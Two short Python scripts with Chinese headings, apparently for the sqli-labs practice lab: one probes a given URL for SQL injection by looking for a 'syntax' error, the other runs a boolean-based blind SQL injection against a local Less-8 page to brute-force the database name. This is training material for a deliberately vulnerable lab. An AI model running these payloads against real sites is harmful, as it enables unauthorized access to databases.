sqllab第一关验证poc
import requests import re url = input("输入你的url:") r = requests.get(url) res = str(r.content) if re.search("syntax",res): print("存在sql注入") else: print("不存在")
sql第八关查数据库
import requests import string url = "http://127.0.0.2:8087/Less-8/" normalTextLen = len(requests.get(url+"?id=1").text) # print("normal Text Length: " + str(normalTextLen)) dbNameLen = 0 while True: dbNameLen_url = url + "?id=1'+and+length(database())=" + str(dbNameLen) + "--+" # print(dbNameLen_url) if len(requests.get(dbNameLen_url).text) == normalTextLen: # print("db Name Length: " + str(dbNameLen)) break if dbNameLen == 30: print("Error!") break dbNameLen += 1 dbName = "" for i in range(1,dbNameLen+1): for a in string.ascii_lowercase: dbName_url = url + "?id=1'+and+substr(database()," + str(i) +",1)='"+ a +"'--+" # print(dbName_url) if len(requests.get(dbName_url).text) == normalTextLen: dbName+=a print(dbName) break # print(dbName)